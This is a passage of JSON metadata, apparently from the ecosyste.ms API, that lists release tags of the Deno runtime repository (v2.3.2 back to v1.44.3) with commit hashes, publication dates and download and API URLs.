epositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda165